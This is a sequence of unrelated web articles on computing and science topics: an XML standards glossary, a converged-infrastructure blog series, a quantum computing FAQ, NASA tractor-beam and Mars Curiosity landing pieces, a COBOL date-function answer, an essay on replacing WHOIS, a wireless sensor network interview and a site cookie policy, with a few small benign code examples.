SAX is a widely adopted API for XML in Java and some other languages.
Schematron - Context-based schema validation
An XML-based schema language that uses XPath to express constraints on values in a given XML instance.
SOAP - Simple Object Access Protocol
Protocol for exchanging structured and typed information between peers in a decentralized, distributed environment. SOAP is a core part of the web services technology stack.
SVG - Scalable Vector Graphics
SVG is a language for describing two-dimensional graphics and graphical applications in XML.
TEI - Text Encoding Initiative
TEI is a set of XML standards used to mark up and annotate literary documents such as plays or speeches.
WSDL - Web Services Description Language
WSDL is a core part of the web services technology stack.
XAML - eXtensible Application Markup Language.
A core Microsoft technology for describing the layout and composition of user interfaces. Used by WPF (Windows Presentation Foundation) and WPF/E (WPF/Everywhere, or Silverlight) - the lightweight, cross-platform version of WPF for rich web-based applications.
XBRL - eXtensible Business Reporting Language
XBRL is a language for the electronic communication of business and financial data which is revolutionizing business reporting around the world. See also XBRL at EMC.
XForms - the next generation of forms technology for the world wide web
XForms is an XML application that represents the next generation of forms for the Web. XForms is not a free-standing document type, but is intended to be integrated into other markup languages, such as XHTML, ODF or SVG. An XForms-based web form gathers and processes XML data using an architecture that separates presentation, purpose and content.
XHTML - The Extensible HyperText Markup Language
XHTML is a family of current and future document types and modules that reproduce, subset, and extend HTML, reformulated in XML.
XML Infoset - XML Information Set
The purpose of this specification is to provide a consistent set of definitions for use in other specifications that need to refer to the information in a well-formed XML document.
XML Schema - the W3C XML Schema Language
XML Schemas define the structure of XML documents.
XML/A - XML for Analysis
A standard that allows client applications to talk to multi-dimensional or OLAP data sources. The communication of messages back and forth is done using web standards - HTTP, SOAP, and XML. The query language used is MDX, which is the most commonly used multi-dimensional expression language today. Hyperion's Essbase, Microsoft's Analysis Services, and SAP's Business Warehouse all support the MDX language and the XMLA specification. Oracle is the only major OLAP vendor not supporting XML/A.
XPath - XML Path Language
XPath is a language for searching and navigating within an XML document. XQuery and XPointer are both built on XPath expressions.
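As a minimal illustration of XPath selection (using Python's standard library, which supports a subset of XPath syntax; the sample document is invented):

```python
import xml.etree.ElementTree as ET

doc = ET.fromstring(
    "<catalog>"
    "<book lang='en'><title>XQuery Basics</title></book>"
    "<book lang='de'><title>XSLT Kochbuch</title></book>"
    "</catalog>"
)

# XPath expression: select the titles of all English-language books.
titles = [t.text for t in doc.findall("./book[@lang='en']/title")]
print(titles)  # ['XQuery Basics']
```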
XProc - an XML Pipeline Language
XProc is a language for describing operations to be performed on XML documents.
XQuery - an XML query language
XML is a versatile markup language, capable of labeling the information content of diverse data sources including structured and semi-structured documents, relational databases, and object repositories. A query language that uses the structure of XML intelligently can express queries across all these kinds of data, whether physically stored in XML or viewed as XML via middleware.
XRX - XForms/REST/XQuery web application architecture
XSLT - eXtensible Stylesheet Language for Transformations
XSLT a language for transforming XML documents into other XML documents (or other text formats, like HTML). | <urn:uuid:9995a9c2-7154-4925-9caf-2f647897e625> | CC-MAIN-2017-04 | https://community.emc.com/docs/DOC-3251 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00340-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.814292 | 1,284 | 2.59375 | 3 |
Get your head around the concepts and problems of unified computing.
Since joining Egenera, I've been championing what's now being termed Converged Infrastructure (aka unified computing). It's an exciting and important part of IT management, demonstrated by the fact that all major vendors are offering some form of the technology. But it sometimes takes a while for folks (my analyst friends included) to get their heads around understanding it.
PART 1: What is Converged Infrastructure, and how it will change data centre management
Converged Infrastructure and Unified Computing are both terms referring to technology where the complete server profile, including I/O (NICs, HBAs, KVM), networking (VLANs, IP load balancing), and storage connectivity (LUN mapping, switch control) are all abstracted and defined/configured in software. The result is a pooling of physical servers, network resources and storage resources that can be assigned on-demand. This approach lets IT operators rapidly re-purpose servers or entire environments without having to physically reconfigure I/O components by hand, and without the requirement of hypervisors. It massively reduces the quantity and expense of the physical I/O and networking components as well as the time required to configure them. A converged infrastructure approach offers an elegant, simple-to-manage approach to data centre infrastructure administration.
From an architectural perspective, this approach may also be referred to as a compute fabric or Processing Area Network. Because the physical CPU state is completely abstracted away, the CPUs become stateless and therefore can be reassigned extremely easily, creating a fabric of components, analogous to how SANs assign logical storage LUNs. Through I/O virtualisation, both data and storage transports can also be converged, further simplifying the physical network infrastructure down to a single wire.
The result is a wire-once set of pooled bare-metal CPUs and network resources that can be assigned on demand, defining their logical configurations and network connections instantly.
There is another nice resource: A whitepaper commissioned by HP, executed by Michelle Bailey at IDC. In it she defines a converged system:
The term converged system refers to a new set of enterprise products that package server, storage, and networking architectures together as a single unit and utilise built-in service-oriented management tools for the purpose of driving efficiencies in time to deployment and simplifying ongoing operations. Within a converged system, each of the compute, storage, and network devices are aware of each other and are tuned for higher performance than if constructed in a purely modular architecture. While a converged system may be constructed of modular components that can be swapped in and out as scaling requires, ultimately the entire system is integrated at either the hardware layer or the software layer.
A Converged Infrastructure is different from, but analogous to, hypervisor-based server virtualisation. Think of hypervisors as operating above the CPU, abstracting software (applications and O/S) from the CPU; think of a Converged Infrastructure as operating below the CPU, abstracting network and storage connections. However, note that Converged Infrastructure doesn't operate via a software layer the way that a hypervisor does. Converged Infrastructure is possible whether or not server virtualisation is present.
Converged Infrastructure and server virtualisation can complement each other producing significant cost and operational benefits. For example, consider a physical host failure where the entire machine, network and storage configuration needs to be replicated on a new physical server. Using Converged Infrastructure, IT Ops can quickly replace the physical server using a spare bare-metal server. A new host can be created on the fly, all the way down to the same NIC, HBA and networking configurations of the original server.
A Converged Infrastructure can re-create a physical server (or virtual host) as well as its networking and storage configuration on any cold bare-metal server. In addition, it can re-create an entire environment of servers using bare-metal infrastructure at a different location as well. Thus it is particularly well-suited to provide both high-availability (HA) as well as Disaster Recovery (DR) in mixed physical/virtual environments, eliminating the need for complex clustering solutions. In doing so, a single Converged Infrastructure system can replace numerous point-products for physical/virtual
server management, network management, I/O management, configuration management, HA and DR.
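As a concrete (and entirely hypothetical) sketch of what "the server profile defined in software" might look like, consider this toy model in Python. A profile carries the NIC, HBA, VLAN and boot-LUN identity, and can be re-attached to any spare bare-metal node on failure. The names and fields are invented for illustration, not any vendor's API:

```python
from dataclasses import dataclass, field

@dataclass
class ServerProfile:
    """Logical server definition: the identity lives here, not in hardware."""
    name: str
    macs: list       # virtual NIC MAC addresses
    wwns: list       # virtual HBA world-wide names
    vlans: list      # VLAN memberships
    boot_lun: str    # boot LUN mapping

@dataclass
class Fabric:
    """Pool of stateless bare-metal nodes; profiles attach on demand."""
    free_nodes: list
    assignments: dict = field(default_factory=dict)

    def assign(self, profile):
        node = self.free_nodes.pop(0)
        self.assignments[profile.name] = node
        return node

    def fail_over(self, profile):
        # On hardware failure: re-attach the same identity to a spare node.
        self.assignments.pop(profile.name, None)
        return self.assign(profile)

fabric = Fabric(free_nodes=["blade-1", "blade-2", "blade-3"])
web = ServerProfile("web01", ["02:00:00:aa"], ["50:01:43:80"], [10], "lun-7")
first = fabric.assign(web)     # lands on "blade-1"
spare = fabric.fail_over(web)  # same profile, now on "blade-2"
```

Because the identity lives in the profile rather than in the hardware, fail-over is just "detach, then attach to the next free node."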
- Simplifying Management for the Other Half of the Data Centre
In the manner that server virtualisation has grown to become the dominant data centre management approach for software, converged infrastructure is poised to become the dominant management approach for the other 50 percent of the data centre: its infrastructure.
However adoption will take place gradually, for a few reasons:
IT can only absorb so much at once. Most often, converged infrastructure is adopted after IT has come up the maturity curve, having cut their teeth on OS virtualisation. Once that initiative is under way, IT then begins looking for other sources of cost take-out... and the data centre infrastructure is the logical next step.
Converged infrastructure is still relatively new. While the market considers OS virtualisation to be relatively mature, converging infrastructure is less-well understood.
But there is one universal approach that can overcome these hesitations -- money. So, in my next installment, I'll do a deeper dive into the really fantastic economics and cost take-out opportunities of converging infrastructure...
PART 2: Converged Infrastructure's Cost Advantages
Let me go a bit deeper and explain the source of the capital and operational improvements Converged Infrastructure offers, and why it's such a compelling opportunity to pursue.
First, the most important distinction to make between converged infrastructure and the old way of doing business is that the management, as well as the technology, is converged. Consider how many point-products you currently use for infrastructure management.
The diagram below has resonated with customers and analysts alike. It highlights, albeit in a stylised fashion, just how many point-products an average-sized IT department is using. This results in a clear impact on:
- Operational complexity: coordinating tool use, procedures, interdependencies and fault-tracking
- Operational cost: the raw expense to acquire and then annually maintain them
- Capital cost: if you count all of the separate hardware components they're trying to manage
That last bullet, the thing about hardware components, is also something to drill down into. Because every physical infrastructure component in the old way of doing things has a cost. I mean I/O components like NICs and HBAs, not to mention switches, load balancers and cables.
What might be possible if you could virtualise all of the physical infrastructure components, and then have a single tool to manipulate them logically?
Well, then you'd be able to throw out roughly 80 percent of the physical components (and the associated costs) and reduce the operational complexity by roughly the same amount.
In the same way that the software domain has been virtualised by the hypervisor, the infrastructure world can be virtualised with I/O virtualisation and converged networking. Once the I/O and network are virtualised, they can be composed/recomposed on demand. This eliminates a large number of components needed for infrastructure provisioning, scaling, and even failover/clustering (more on this later). If you can now logically redefine server and infrastructure profiles, you can also create simplified disaster recovery tools too.
In all, we can go from roughly a dozen point-products down to just 2-3 (see diagram below). Now: What's the impact on costs?
On the capital cost side, since I/O is consolidated, it literally means fewer NICs and the elimination of most HBAs, since they can be virtualised too. Consolidating I/O also implies converged transport, meaning fewer cables (typically only 1 per server, 2 if teamed/redundant). A converged transport also allows for fewer switches on the network. Also remember that with fewer moving (physical) parts, you have to purchase fewer software tools and licenses. See diagram on facing page.
On the operational cost side, there are the benefits of simpler management, less on-the-floor maintenance, and even less power consumption. With fewer physical components and a more virtual infrastructure, entire server configurations can be created more simply, often with only a single management tool. That means creating and assigning NICs, HBAs, ports, addresses and world-wide names. It means creating segregated VLAN networks, creating and assigning data and storage switches. And it means automatically creating and assigning boot LUNs. The server configuration is just what you're used to, except it's defined in software, and all from a single unified management console. The result: buying, integrating and maintaining less software.
Ever wonder why converged infrastructure is developing such a following? It's because physical simplicity breeds operational efficiency. And that means much less sustained cost and effort. And an easier time at your job.
PART 3: Converged Infrastructure: What it Is, and What it Isn't
In my two earlier posts, I first took a stab at an overview of converged infrastructure and how it will change IT management, and in the second installment, I looked a bit closer at converged infrastructure's cost advantages. But one thing I sense I neglected was to define what's meant by converged infrastructure (BTW, Cisco terms it Unified Computing). Even more important, I also feel the need to highlight what converged infrastructure is not. Plus, there are vendor instances where the Emperor Has No Clothes -- i.e. where some marketers claim they suddenly have converged infrastructure when the fact remains that they are vending the same old products. Why split hairs in defining terms? Because true converged infrastructure / unified computing has architectural, operational, and capital cost advantages over traditional IT approaches. (AKA: don't buy the used car just because the paint is nice.)
Defining terms - in the public domain
Obviously, it can't hurt to see how the vendors self-describe the offerings... here goes:
Cisco's Definition (via webopedia): "...simplifies traditional architectures and dramatically reduce the number of devices that must be purchased, cabled, configured, powered, cooled, and secured in the data centre. The Cisco Unified Computing System is a next-generation data centre platform that unites compute, network, storage access, and virtualisation into a cohesive system..."
Egenera's Definition: "A technology where CPU allocation, data I/O, storage I/O, network configurations, and storage connections are all logically defined and configured in software. This approach allows IT operators to rapidly re-purpose CPUs without having to physically reconfigure each of the I/O components and associated network by hand -- and without needing a hypervisor."
HP's Definition: "HP Converged Infrastructure is built on a next-generation IT architecture based on standards that combines virtualised compute, storage and networks with facilities into a single shared-services environment optimised for any workload."
Defining terms - by using attributes
Empirically, converged infrastructure needs to have two main attributes (to live up to its name): it should reduce the quantity and complexity of physical IT infrastructure, and it should reduce the quantity and complexity of IT operations management tools. So let's be specific:
Ability to reduce quantity and complexity of physical infrastructure:
- virtualise I/O, reducing physical I/O components (e.g. eliminate NICs and HBAs)
- leverage converged networking, reducing physical cabling and eliminating recabling
- reduce overall quantity of servers, (e.g. ability to use free pools of servers to repurpose for scaling, failure, disaster recovery, etc.)
Ability to reduce quantity and complexity of operations/management tools:
- be agnostic with respect to the software payload (e.g. O/S independent)
- fewer point-products, less paging between tool windows (BTW, this is possible because so much of the infrastructure becomes virtual and is therefore more easily logically manipulated)
- reduce/eliminate the silos of visualising & managing physical vs virtual servers, physical networks vs virtual networks
- simplified higher-level services, such as providing fail-over, scaling-out, replication, disaster recovery, etc.
To sum up so far, if you're shopping for this stuff, you need to:
a) Look for the ability to virtualise infrastructure as well as software
b) Look for fewer point products and less windowing
c) Look for more services (e.g. HA, DR) baked into the product.
Beware.... when the Emperor Has No Clothes...
In closing, I'll also share my pet peeve: when vendors whitewash their products to fit the latest trend. I'll not name names, but beware of the following stuff labeled converged infrastructure:
- If the vendor says Heterogeneous Automation - that's different. For example, it could easily be scripted run-book automation. This doesn't reduce physical complexity in the least.
- If the vendor says Product Bundle, single SKU - Same as above. Shrink-wrapped does not equal converged.
- If the vendor says Pre-Integrated - This may simplify installation, but does not guarantee physical simplicity nor operational simplicity.
Thanks for reading the series so far. I'm pondering a fourth-and-final installment on where this whole virtualisation and converged infrastructure thing is taking us - a look at possible future directions.
Ken Oestreich is a marketing and product management veteran in the enterprise IT and data centre space, with a career spanning start-ups to established vendors. Ken currently works as Vice President - Product Marketing at Egenera.
This article is published with prior permission.
7.17 What is quantum computing?
Quantum computing [Ben82] [Fey82] [Fey86] [Deu92] is a new field in computer science that has been developed with our increased understanding of quantum mechanics. It holds the key to computers that are exponentially faster than conventional computers (for certain problems). A quantum computer is based on the idea of a quantum bit or qubit. In classical computers, a bit has a discrete range and can represent either a zero state or a one state. A qubit can be in a linear superposition of the two states. Hence, when a qubit is measured the result will be zero with a certain probability and one with the complementary probability. A quantum register consists of n qubits. Because of superposition, a phenomenon known as quantum parallelism allows exponentially many computations to take place simultaneously, thus vastly increasing the speed of computation.
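The measurement rule above is easy to illustrate with a purely classical sketch (Python; this merely samples outcome probabilities and is in no way a quantum computer). For a state a|0> + b|1>, a measurement yields 1 with probability |b|^2:

```python
import random
from math import sqrt

def measure(alpha, beta, trials=100_000, seed=42):
    """Sample repeated measurements of the state alpha|0> + beta|1>.
    The outcome is 1 with probability |beta|**2, 0 otherwise.
    Amplitudes must satisfy |alpha|**2 + |beta|**2 == 1."""
    assert abs(abs(alpha) ** 2 + abs(beta) ** 2 - 1.0) < 1e-9
    rng = random.Random(seed)
    p_one = abs(beta) ** 2
    ones = sum(rng.random() < p_one for _ in range(trials))
    return ones / trials  # observed frequency of outcome 1

# A classical bit: always |0>, so outcome 1 never occurs.
always_zero = measure(1.0, 0.0)

# Equal superposition: outcome 1 about half the time.
half = measure(1 / sqrt(2), 1 / sqrt(2))
```

The classical bit is the degenerate case (probabilities 0 or 1); the superposed qubit gives each outcome with its amplitude-squared probability.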
Quantum interference, the analog of Young's double-slit experiment that demonstrated constructive and destructive interference phenomena of light, is one of the most significant characteristics of quantum computing. Quantum interference improves the probability of obtaining a desired result by constructive interference and diminishes the probability of obtaining an erroneous result by destructive interference. Thus, among the exponentially many computations, the correct answer can theoretically be identified with appropriate quantum ``algorithms.''
It has been proven [Sho94] that a quantum computer will be able to factor (see Question 2.3.3) and compute discrete logarithms (see Question 2.3.7) in polynomial time. Unfortunately, the development of a practical quantum computer still seems far away because of a phenomenon called quantum decoherence, which is due to the influence of the outside environment on the quantum computer. Brassard has written a number of helpful texts in this field [Bra95a] [Bra95b] [Bra95c].
Quantum cryptography (see Question 7.18) is quite different from, and currently more viable than, quantum computing.
NASA aims to build real tractor beams
- By Greg Crowe
- Nov 03, 2011
The latest installment in my series that I am now calling “Holy Crap, Science Fiction is Finally Here!” involves NASA’s announcement that they will be working on tractor beams.
Yes, you read that right – NASA is actually trying to figure out how to make a working tractor beam. My fellow sci-fi fans may need to use the facilities right about now. Don’t worry, I’ll wait.
Long has the tractor beam – the ability to move objects using only laser beams – been a staple of science fiction. Both the “Star Trek” and “Star Wars” universes have them, and it has been featured in literature as early as the late 1920s. Real-life scientists have been theorizing about its potential development since the 1960s. But only recently has any headway been made into bringing them closer to reality.
Now NASA has set aside money for a team to study various methods by which tractor beams might be developed for practical use. Likely one of the first uses a working prototype would be put to collect particle and molecular samples from things such as comet tails more efficiently than current methods.
One process uses two overlapping pulsating beams that exploit changes in air temperature, so that particles are pulled up between them with a sort of light-based peristalsis. Another uses solenoid beams whose waves spiral around an axis and can suck up particles like a straw.
A third method, one that has never been developed beyond the theory stage, involves a beam of light whose cross-section looks like ripples in a pond, and which can induce magnetic fields in the path of an object.
Once put into use with current technology, these methods will only be effective on matter at the molecular level. So, unfortunately, you won’t be able to use lasers to move your sleeper sofa into the house any time soon. For that you’ll still have to rely on the current technology — a pick-up truck, three friends who owe you a favor and a couple six packs of beer.
Greg Crowe is a former GCN staff writer who covered mobile technology. | <urn:uuid:5b7f699b-681e-4dad-aeb6-7fbc9333515b> | CC-MAIN-2017-04 | https://gcn.com/articles/2011/11/03/nasa-tractor-beam-research.aspx?admgarea=TC_EMERGINGTECH | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00515-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960541 | 475 | 3.390625 | 3 |
Next time you are asked to deliver what seems like the impossible, give a thought to the technology and engineering team that landed the Mars Curiosity Rover.
In August 2012, the Curiosity landed on Mars, having only 7 minutes to go from the top of the planet's atmosphere to the ground surface, decelerating from 13,000 miles an hour to zero. If the timing, speed, aerodynamics, density or anything else had deviated from the plan, it would have been game over and all the effort would have gone to waste.
Speaking at the recent YOW! conference in Sydney, Anita Sengupta, engineer at NASA’s Jet Propulsion Laboratory (JPL), spoke about one of the most challenging technology and engineering projects to have worked on.
When it comes to projects as ambitious as landing on Mars, there’s little room for error. It takes an immense amount of careful calculating, planning, designing, testing and deploying, only to then get one chance to either make it or break it. A ‘quickly release to market and see how it goes’ strategy does not translate to these types of NASA missions that cost billions of dollars.
“The environment between Earth and Mars is so different – different atmospheric density, different atmosphere composition, and different speed relative to the speed of sound,” Sengupta said of the challenges in designing equipment that will work with another planet’s physics.
“The problem with Mars is that the atmosphere is very thin; you only have 1 per cent of what it is on the surface of Earth. So landing on Mars is very, very difficult because of this.”
The other challenge was that NASA scientists wanted the Curiosity to land in a tight location in the Gale Crater. It’s this location that is believed to be rich in information on Mars’ history as being an ancient riverbed.
Fun fact: The Gale Crater is named after an Australian (Sydney based) astronomer called Walter Frederick Gale, who closely observed Mars back in the late 19th century.
“You can think about it as a bullseye on Mars,” Sengupta said of the tight space the Curiosity vehicle had to land in, while plummeting towards it at thousands of miles per hour.
“We are going from a distance of 300 million kilometres away and we are landing in an area of 20 km by 7 km. That's very, very difficult to do from a precision perspective.
“In Gale Crater, we wanted to land in a landing ellipse to ensure we wouldn't collide with the mountain in the middle or collide with the crater walls.”
The on-board computer had to handle all that to control the equipment and properly land the vehicle, which took an incredible amount of software, Sengupta said.
“One of the critical technologies is the ability to fly the vehicle. So the vehicle is a lifting body, and by rotating the location of the lift vector, you can actually [generate a] lift and change your course direction as you go down. All of that is flown autonomously by the on-board flight software,” she said.
Computer simulations were also key to making the landing project successful. As Earth is very different from Mars, it would be impossible to fully recreate the right environment on Earth to test whether the vehicle, and the parachute attached to help it land when closer to the ground, would work.
Monte Carlo simulations, which take into account density, speed, aerodynamics and other parameters, were run on supercomputers. The simulations were also validated against subscale experiments in a supersonic wind tunnel to see if the findings matched.
“We ran the simulations to be able to understand what's going on with the interaction with the supersonic flow field and the interaction with the parachute.
“It was confirmed that the physics that we were seeing in the simulation was actually happening in the supersonic wind tunnel of about 3 per cent of the scale of the full size.”
High-speed cameras (about 2,000 frames per second) and post digital image processing technology were used to capture the events happening at extremely fast speeds in the wind tunnel, which helped with designing the parachute to ensure it could withstand Mars' atmosphere.
Although the team was almost spot on in landing in the exact ideal spot in the Gale Crater, the vehicle is not yet equipped to automatically re-adjust the speed or whatever it needs to in real time if there's a slight miscalculation or something isn't fully taken into account when doing the simulations.
However, Sengupta said margins are used when doing calculations on things that are not well-known in Mars such as aerodynamic heating, and these margins are also factored into the simulations.
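As a toy illustration of the Monte Carlo idea (the error dispersions below are invented for the example and are not JPL's numbers), one can sample downrange and crossrange landing errors and count the fraction of simulated landings that fall inside a 20 km by 7 km ellipse:

```python
import random

def landing_dispersion(trials=50_000, seed=7):
    """Toy Monte Carlo: draw downrange/crossrange landing errors (km)
    from assumed Gaussian dispersions and count the fraction of
    landings inside a 20 km x 7 km ellipse (semi-axes 10 and 3.5)."""
    rng = random.Random(seed)
    a, b = 10.0, 3.5
    inside = 0
    for _ in range(trials):
        x = rng.gauss(0.0, 3.0)   # downrange error; sigma is an assumption
        y = rng.gauss(0.0, 1.0)   # crossrange error; sigma is an assumption
        if (x / a) ** 2 + (y / b) ** 2 <= 1.0:
            inside += 1
    return inside / trials

fraction_inside = landing_dispersion()
```

A real dispersion analysis perturbs many more parameters (atmospheric density, winds, aerodynamic coefficients, mass properties) and runs the full entry dynamics for each sample, but the counting logic is the same.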
As Mr. William has already guided you to the right way, here is just a little more light on how this works.
The INTEGER-OF-DATE function returns an integer that is the number of days by which the input date succeeds December 31, 1600 in the Gregorian calendar. The function result is a seven-digit integer with a range from 1 to 3,067,671.
So basically, INTEGER-OF-DATE(INPUTDATE) returns an integer representing the number of days between 12/31/1600 and your input date.
So now you should have no problem understanding how this works:
COMPUTE NUMBER-DAYS-1 = FUNCTION INTEGER-OF-DATE(YYYYMMDD). *> input date 1
COMPUTE NUMBER-DAYS-2 = FUNCTION INTEGER-OF-DATE(YYYYMMDD). *> input date 2
COMPUTE DIFFERENCE-DAY = NUMBER-DAYS-1 - NUMBER-DAYS-2.
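If you want to sanity-check the arithmetic outside COBOL, here is a rough Python equivalent (the function and variable names are mine; Python's date.toordinal() uses the same proleptic Gregorian calendar that INTEGER-OF-DATE assumes):

```python
from datetime import date

EPOCH = date(1600, 12, 31)  # INTEGER-OF-DATE counts days after this date

def integer_of_date(d):
    """Rough equivalent of COBOL's INTEGER-OF-DATE intrinsic."""
    return d.toordinal() - EPOCH.toordinal()

number_days_1 = integer_of_date(date(2024, 3, 15))
number_days_2 = integer_of_date(date(2024, 3, 1))
difference_day = number_days_1 - number_days_2  # 14 days apart
```

The day-count range matches the documented limits: January 1, 1601 maps to 1, and December 31, 9999 maps to 3,067,671.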
No, that title is not a typo. The WHOIS service and the underlying protocol are a relic of another Internet age and need to be replaced.
At the recent ICANN 43 conference in Costa Rica, WHOIS was on just about every meeting agenda for two reasons. First, the Security and Stability Advisory Committee put out SAC 051, which called for a replacement WHOIS protocol, and at ICANN 43 there was a panel discussion on such a replacement. The second reason was the draft report from the WHOIS Policy Review Team.
This is hardly the first time there has been hand-wringing about WHOIS, especially at ICANN. So what's all the noise about now?
What is WHOIS?
To understand why we have WHOIS at all, a little history is needed. In the ancient pre-history of the Internet was a network called the ARPANET. It was an experimental network and as you might imagine, an important part of running an experimental network is being able to get in touch with the people participating in the experiment when something goes wrong.
Initially, the contact information was maintained at the Network Information Center, and over time, it migrated online. It appeared in the NICNAME/WHOIS service and the protocol was published in RFC 812 in 1982. To give an idea of how long ago that is in Internet terms, the ARPANET didn't officially transition to TCP/IP and DNS didn't exist until 1983.
Because WHOIS was really intended to be a service devoted to finding people's contact information when one needed to reach them, it was also a service designed to be consumed by humans. This made for a very simple protocol with free-form text in replies. In the 1990s — when our contemporary domain name management system came to be with ICANN, registrars, registries, and billions of people online — WHOIS came along for the ride.
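To see just how simple the protocol is, here is a minimal client sketch (Python; the server name is only an example, and error handling is omitted). Per the protocol's later specification in RFC 3912, a query is a single line terminated by CR LF sent over TCP port 43, and the reply is free-form text read until the server closes the connection:

```python
import socket

def build_query(name):
    """WHOIS framing: the query is one line ending in CR LF."""
    return name.encode("ascii") + b"\r\n"

def whois(name, server="whois.iana.org", timeout=10):
    """Minimal WHOIS client: open TCP port 43, send the query,
    read the free-form text reply until the server closes."""
    with socket.create_connection((server, 43), timeout=timeout) as sock:
        sock.sendall(build_query(name))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")

# e.g. print(whois("example.com"))
```

Note there is no authentication, no structure in the reply, and no way to vary the answer by requester -- exactly the limitations discussed below.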
People started using the term "WHOIS" to mean the protocol, but also the service (which is sometimes delivered as, for example, a web page), and even the data that you can get out of the service.
The registration data for domain names can be useful. Different parts of the data are useful to different people, but WHOIS cannot make those partial distinctions. Also, WHOIS is anonymous, so not only does everyone get the same data, but the WHOIS service doesn't even know who asked for the data. Because of that, many people who value their privacy simply lie when they enter registration data. That way, their phone numbers or street addresses can't be looked up by just anyone on the Internet.
A different environment, a different tool
The Internet has evolved considerably since WHOIS was specified and we have different problems than we did in those days. On a network (like the ARPANET) where it was at least theoretically possible to get a list of every person on it, things like spam were not a problem. Today, we need to be able to tell whether several domains are controlled by the same person in order to combat mail abuse.
And while it might be perfectly appropriate for law enforcement to be able to get your street address under the right circumstance, it isn’t clear that your address needs to be published for more than two billion people to see just so that you can have a domain name. Solving these sorts of problems will be impossible if the Internet community doesn’t settle on a new data access protocol without the limitations of WHOIS.
Work is just getting started and at this week’s IETF meeting, we hope to take another step on this path. We hope others in the ICANN and IETF communities will also work on making this much-needed improvement to the registration landscape.
Dyn was pleased to express its support for the SAC 051 recommendations and a plan to implement them. Dyn Labs is working on prototype versions of WHOIS protocol replacements so that once a new protocol standard is ready to go, we can move quickly to replace the old, less useful service with a new one.
By Andrew Sullivan, Director of Labs at Dyn
Measuring Our World with Wireless Sensor Networks
I recently interviewed Seapahn Megerian, a professor in the Electrical and Computer Engineering Department at the University of Wisconsin, about wireless sensor networks for an upcoming feature for CertMag’s Systems & Networks community. He talked about some very intriguing possibilities for this new technology, including space exploration, as well as some potential drawbacks.
For those of you who don’t know what wireless sensor networks are and want a relatively simple explanation, think back to the movie “Twister.” Remember those metallic balls that Helen Hunt and Bill Paxton’s characters sent up into the tornado to measure dimensions like size and wind speed? Imagine those balls being shrunk to the size of marbles or even smaller, and you have a pretty good sense of how a wireless sensor network might look.
In fact, their diminutive size is one of their most appealing qualities, Megerian said. “Miniaturization is one of the stronger motivators for the advent of wireless sensor networks. Smaller, faster and lower power, which essentially mean cheaper, can have tremendous impacts on virtually any branch of computer engineering. Nanotechnology not only opens new door in terms of new sensor technologies, but also in terms of tiny actuators that when combined with sensors and computers can go a step beyond in just observing and learning. With actuators, we can actually do stuff!”
However, we have to be careful when using these technologies, because their presence may wind up changing the environment they’re intended to measure. “We must also be conscious of the environmental effects that placing such sensor nodes can have, especially in large quantities,” he said. “Given the current battery technologies, it is clear that we do not want them sprinkled everywhere and left as garbage when they exhaust their useful lifetimes. When you are sending hundreds of satellites into orbit, and leave them there as space dust, it doesn’t really matter. But throwing 100,000 sensor nodes from an airplane to monitor a habitat here on Earth can have very significant environmental repercussions down the line.”
“We must be careful to not become too entangled by complex technologies around us. Having a typical user in mind, I think it is crucial to make sure the wireless sensor networks we design integrate into the surroundings as seamlessly as possible. In other words, if I have 100 sensor nodes in my house, I don’t want 100 blinking clocks that are always stuck at 12:00 a.m. (a nod to the old VCR days)!”
A cookie is a data file that websites store on your computer, so that they can recognize your computer the next time you visit the website.
Cookies are sent back and forth between your browser and a Web server and contain information such as:
The contents of a shopping basket
Whether a user is logged in
Usage of the website
A cookie file is passive and cannot spread computer viruses or other malicious programs. Often they help analyze how the website is used, to improve the user experience. In several cases, cookies may be necessary to provide a service.
Cookies are usually automatically deleted from the browser when it is closed (so-called session cookies). Cookies can also be set with an expiration time, so that data exists for a shorter or longer period (persistent cookies). Persistent cookies are usually stored on the hard disk.
Furthermore, a distinction is usually made between first party cookies and third party cookies. First Party Cookies are set by the page the user visits. Third Party Cookies are set by a third party, which has elements embedded on the page the user visits.
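The session/persistent distinction above comes down to whether the server attaches an expiration to the cookie. A minimal sketch of the two kinds of Set-Cookie headers (the cookie names and values are made-up examples, not ones any particular site uses):

```python
from datetime import datetime, timedelta, timezone

def session_cookie(name, value):
    # No Expires/Max-Age attribute: the browser discards the cookie
    # when it is closed (a session cookie).
    return f"Set-Cookie: {name}={value}; Path=/; HttpOnly"

def persistent_cookie(name, value, days):
    # An Expires attribute makes the cookie survive browser restarts
    # until the given date (a persistent cookie, stored on disk).
    expires = (datetime.now(timezone.utc) + timedelta(days=days)).strftime(
        "%a, %d %b %Y %H:%M:%S GMT")
    return f"Set-Cookie: {name}={value}; Path=/; Expires={expires}"

print(session_cookie("basket", "item42"))
print(persistent_cookie("prefs", "en", 30))
```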
Cookies from Google Analytics
At heimdalsecurity.com we use Google Analytics to analyze how users use the site. The information collected by the cookie about your use (traffic data, including your IP address), is transmitted to and stored on Google servers in the U.S. Google uses this information to evaluate your use of the website, compiling reports on website activity and providing other services relating to website activity and internet usage. Google may also transfer this information to third parties if required by law, or if third parties process the information on Google's behalf.
Google Analytics uses two types of cookies: a persistent cookie that indicates whether the user is recurrent, where the user comes from, which search engine was used, keywords, etc.; and session cookies, which are used to show when and how long a user is on the site. Session cookies expire after each session, i.e., when you close your tab or browser. Google does not match your IP address with other data Google holds.
If you wish not to receive cookies from heimdalsecurity.com, you can, in most new browsers, select advanced cookie settings under Internet options and add this domain to the list of websites you want to block cookies from.
If you do not want your visit to be recorded by Google Analytics, you can take advantage of Google’s Opt-Out Browser Add-on. Be aware that if you install this browser plugin, your visits to other sites that use Google Analytics will not be registered either.
See also these guides for the most common browsers:
Instructions for deleting cookies in Microsoft Internet Explorer
Guide to delete cookies in Mozilla Firefox browser
Guide to delete cookies on the Google Chrome browser
Guide to delete flash cookies (for all browsers)
Why does heimdalsecurity.com inform about this?
Cookies are used to collect data on Internet users' behavior. Although this is usually done to give the user a better experience, or is technically necessary for a solution to work, the user should be informed that it happens and should be able to prevent it from happening in the future.
